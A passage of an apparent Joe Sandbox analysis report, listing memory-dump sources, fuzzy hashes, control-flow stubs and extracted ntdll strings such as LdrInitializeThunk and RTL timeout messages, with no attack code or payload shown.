                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b41ece1b171a4f7179af90905bb671bc78d0281b34be184adf74c3e8fc7f22c4
                                                                                      • Instruction ID: 08d74ea5aa4ee914bb66bf2d776a735d8ac3e1eb52bd0b25c81b4dd9abd39b33
                                                                                      • Opcode Fuzzy Hash: b41ece1b171a4f7179af90905bb671bc78d0281b34be184adf74c3e8fc7f22c4
                                                                                      • Instruction Fuzzy Hash: 2090022921380403D184B158550860A000587D5602F95E415A0016558CCB1689695321
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 14 31d2d30-31d2d3c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 41a98d910681bc070fd7a9473af5879e09598b724bd2857fda4e82b5688e2e31
                                                                                      • Instruction ID: 1d6be6f881577b58657fee55b370efd2b4f04aad8d6833d880dcd20efda069a5
                                                                                      • Opcode Fuzzy Hash: 41a98d910681bc070fd7a9473af5879e09598b724bd2857fda4e82b5688e2e31
                                                                                      • Instruction Fuzzy Hash: 2290022130180403D144B15855186064005D7E5701F55E011E0415554CDB1689565222
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 15 31d2dd0-31d2ddc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1aa1a63a2abaabb4e1e9c12c2ef604fb8515d4391a526d55c5fd9e3e3a6921fa
                                                                                      • Instruction ID: d5b059ab8823b0c47fbe6b6c8f6e9c75dc477de2a5063ec0b4a0ba7d330668c5
                                                                                      • Opcode Fuzzy Hash: 1aa1a63a2abaabb4e1e9c12c2ef604fb8515d4391a526d55c5fd9e3e3a6921fa
                                                                                      • Instruction Fuzzy Hash: 1E900221242845535549F1584504507400697E4641795D012A1415950C87279956D621
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 16 31d2df0-31d2dfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 328590cec20eea04cb506733ca2e2c2f2f87e9264b559aa99a6660f0346d0a25
                                                                                      • Instruction ID: 57acc7bdc75403b526ae999df4dc7f994bd743a139b0ddf596870d8cd8cd1424
                                                                                      • Opcode Fuzzy Hash: 328590cec20eea04cb506733ca2e2c2f2f87e9264b559aa99a6660f0346d0a25
                                                                                      • Instruction Fuzzy Hash: 3B90023120180813D115B1584604707000987D4641F95D412A0425558D97578A52A121
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 11 31d2c70-31d2c7c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 216b38be99530de67ce56af334e25a51aca21746cb704a8a8058c2d31b802a16
                                                                                      • Instruction ID: 484e3f84f130a6e2537cbf0f04b743dfa7b3784918a298c65b36ba0a896a03f4
                                                                                      • Opcode Fuzzy Hash: 216b38be99530de67ce56af334e25a51aca21746cb704a8a8058c2d31b802a16
                                                                                      • Instruction Fuzzy Hash: 3C90023120188C03D114B158850474A000587D4701F59D411A4425658D879689917121
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 10 31d2c60-31d2c6c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e920c026e7868087f6edff319702a4de242a422ab3376a44c5d41299645ce0a4
                                                                                      • Instruction ID: 090354a28c9dffe3941f39f1aee9703fa7aaf87be8112a314202c9bb311ddef1
                                                                                      • Opcode Fuzzy Hash: e920c026e7868087f6edff319702a4de242a422ab3376a44c5d41299645ce0a4
                                                                                      • Instruction Fuzzy Hash: DF90023120180C43D104B1584504B46000587E4701F55D016A0125654D8716C9517521
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 12 31d2ca0-31d2cac LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 88896a45e68346fbc62f2ecc5140e9f6821e890f0e52e3bf64f25e7f808f2c2b
                                                                                      • Instruction ID: 6c1bc5d287457dfec1785702f69b51632eff13ff601256d6576cfbe4255f8930
                                                                                      • Opcode Fuzzy Hash: 88896a45e68346fbc62f2ecc5140e9f6821e890f0e52e3bf64f25e7f808f2c2b
                                                                                      • Instruction Fuzzy Hash: 0490023120180803D104B5985508646000587E4701F55E011A5025555EC76689916131
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8a266f2748304f3e0f32836d21762705f08ff2d1ffc12d13226869ff8d6b4673
                                                                                      • Instruction ID: d66a03258bfc2093e265cc569defb09514af33c2e88bab33211f9d3036ee27d8
                                                                                      • Opcode Fuzzy Hash: 8a266f2748304f3e0f32836d21762705f08ff2d1ffc12d13226869ff8d6b4673
                                                                                      • Instruction Fuzzy Hash: E990023160590803D104B1584614706100587D4601F65D411A0425568D87968A5165A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f5b0464008921b7ce906a5f5c75870a3cc01dc72d9d1201b1634c7da13578f0e
                                                                                      • Instruction ID: f4836a5573d8a0627e0bd09f064908733d7ef83cf0e21d65350424bc30b6982e
                                                                                      • Opcode Fuzzy Hash: f5b0464008921b7ce906a5f5c75870a3cc01dc72d9d1201b1634c7da13578f0e
                                                                                      • Instruction Fuzzy Hash: 0790022124585503D154B15C45046164005A7E4601F55D021A0815594D875689556221
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 0 31d2c0a-31d2c0f 1 31d2c1f-31d2c26 LdrInitializeThunk 0->1 2 31d2c11-31d2c18 0->2
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a0fb89806f683d1eb8a96087555528e3ba9d98c45cb40c9b58e538ab1d25e306
                                                                                      • Instruction ID: ef8d444652e5178c3827649d44e8ecf3a355aa62d2a0d6aff787b2da276006d0
                                                                                      • Opcode Fuzzy Hash: a0fb89806f683d1eb8a96087555528e3ba9d98c45cb40c9b58e538ab1d25e306
                                                                                      • Instruction Fuzzy Hash: 74B09B719019C5C7DA15E7604708717790467D5701F29C561D2130641E4739C5D1E175
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2175034709.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2a70000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e08a6fec3f22353474cc37b2baeea1cbfae0555b918335b34bda9e4e4c23f8c4
                                                                                      • Instruction ID: ebbc7e38d39232aa8072abc3049c7a46807266884709e59069fdef6a771d3880
                                                                                      • Opcode Fuzzy Hash: e08a6fec3f22353474cc37b2baeea1cbfae0555b918335b34bda9e4e4c23f8c4
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: 315ea817e17bd11d21384d9b16ca13cf80174533f9dc670a66cd22f20f279e05
                                                                                      • Instruction ID: e6347a103b5e0fe8299d1988bd504311fe3f2475f92ad6ea62972d8e8a9192f4
                                                                                      • Opcode Fuzzy Hash: 315ea817e17bd11d21384d9b16ca13cf80174533f9dc670a66cd22f20f279e05
                                                                                      • Instruction Fuzzy Hash: 465127B6A00216BFCB24DB98C88097EFBF8BB0D2017548569E475D7641D374DE558BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: ce6bcc86342e1b16b4fbb398ae4be96ab16203c825a64b4bb29de58b0a8ae4e0
                                                                                      • Instruction ID: f0d42c091ddcb8d257e2f34d246451f664633130b9361129264f55f671532a85
                                                                                      • Opcode Fuzzy Hash: ce6bcc86342e1b16b4fbb398ae4be96ab16203c825a64b4bb29de58b0a8ae4e0
                                                                                      • Instruction Fuzzy Hash: 9B51B569A10746AFCB28DB9EC89097FB7F9DF48201B088C59F4A5D7641D7B4DA808B60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03204725
                                                                                      • ExecuteOptions, xrefs: 032046A0
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03204655
                                                                                      • Execute=1, xrefs: 03204713
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03204742
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032046FC
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03204787
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: cccb7fd17ecfda079c280430d6669cbf600fb3070ab475ec4faf429649afa50b
                                                                                      • Instruction ID: 83eb321082e8ebebe68c02783d21867b3b82d9f24cf98cb0964e902bdd991f5f
                                                                                      • Opcode Fuzzy Hash: cccb7fd17ecfda079c280430d6669cbf600fb3070ab475ec4faf429649afa50b
                                                                                      • Instruction Fuzzy Hash: FB51F935A103697FEF10EBA5DD89BADB3B8AF1C700F0401ADD515AB1D1DBB09A858F50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                      • Instruction ID: 2ad8851c752e1489e64a5f55d8981c85f147cce9a87ac5dfc10174780197d061
                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                      • Instruction Fuzzy Hash: 96022475518341AFC304CF18C890A6FBBE5EFC8704F048A6DF9899B264DB75E985CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-$0$0
                                                                                      • API String ID: 1302938615-699404926
                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction ID: 3a27628a9c27f8aa5024b2afe5a9f2d37e0b993f0b4ad60b0ee791790d35a62c
                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction Fuzzy Hash: D3818074E092499BDF28CE68C8917FEBBA5AF4E350F1EC259D852A73D0C7349880CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$[$]:%u
                                                                                      • API String ID: 48624451-2819853543
                                                                                      • Opcode ID: ace7e335bfdb2e06d03595ea7a39b79e4a35bdd6d564d9fe35f8a1257865b45a
                                                                                      • Instruction ID: ca465fb6545419635d2b3365ad702c0af353f56b58880f6cc878eeebfdce1e49
                                                                                      • Opcode Fuzzy Hash: ace7e335bfdb2e06d03595ea7a39b79e4a35bdd6d564d9fe35f8a1257865b45a
                                                                                      • Instruction Fuzzy Hash: DB21567AA102199BDB14DF6AD8409AFB7E8AF48A40F080515F915E7201E771DA41CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 0320031E
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032002BD
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032002E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      • Opcode ID: e5143cf9f5b975143a1fbca3a86df97011a1022bf6c84c27c24582b6aa8fa074
                                                                                      • Instruction ID: db5d3de785891b7a58589f55bae0835e317533927b414473f04e6302102b05c5
                                                                                      • Opcode Fuzzy Hash: e5143cf9f5b975143a1fbca3a86df97011a1022bf6c84c27c24582b6aa8fa074
                                                                                      • Instruction Fuzzy Hash: 10E1DF346147429FD725CF28C884B6AB7F0BF89714F184A6DF4A58B2D1D774D88ACB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 03207BAC
                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03207B7F
                                                                                      • RTL: Resource at %p, xrefs: 03207B8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 0-871070163
                                                                                      • Opcode ID: 07188668027a9f496f792844e975af972679fea89aa0995a10af4bdadf8b9282
                                                                                      • Instruction ID: 0c5ab904db874ff1c01ecd3073b8716044183eb206d57b9932ad3f638a132033
                                                                                      • Opcode Fuzzy Hash: 07188668027a9f496f792844e975af972679fea89aa0995a10af4bdadf8b9282
                                                                                      • Instruction Fuzzy Hash: 554122353187429FC724CE29C841B6AB7E5EF9C710F044A2DF85ADB780DB70E8458B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0320728C
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 032072C1
                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03207294
                                                                                      • RTL: Resource at %p, xrefs: 032072A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 885266447-605551621
                                                                                      • Opcode ID: fd65fba54d48f005470d6dcb863381b474546dbaa489d9b6df92482397e65acd
                                                                                      • Instruction ID: d700e233a5673ff8b3534971219a31f53fe0588949b0e4c79011c3122f2f62c1
                                                                                      • Opcode Fuzzy Hash: fd65fba54d48f005470d6dcb863381b474546dbaa489d9b6df92482397e65acd
                                                                                      • Instruction Fuzzy Hash: 10411035618246AFC720CE28CC42B6AB7A5FF58710F144619F855EB281DB31F896CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$]:%u
                                                                                      • API String ID: 48624451-3050659472
                                                                                      • Opcode ID: 72628cde6d088d830969532e77bbdd285542c6f7d0442b9025a7c5f79ab5e252
                                                                                      • Instruction ID: e8197c330c19bc426e2d8ae47831e2216beefb3f9f0198b7ef6e77421b0c8c57
                                                                                      • Opcode Fuzzy Hash: 72628cde6d088d830969532e77bbdd285542c6f7d0442b9025a7c5f79ab5e252
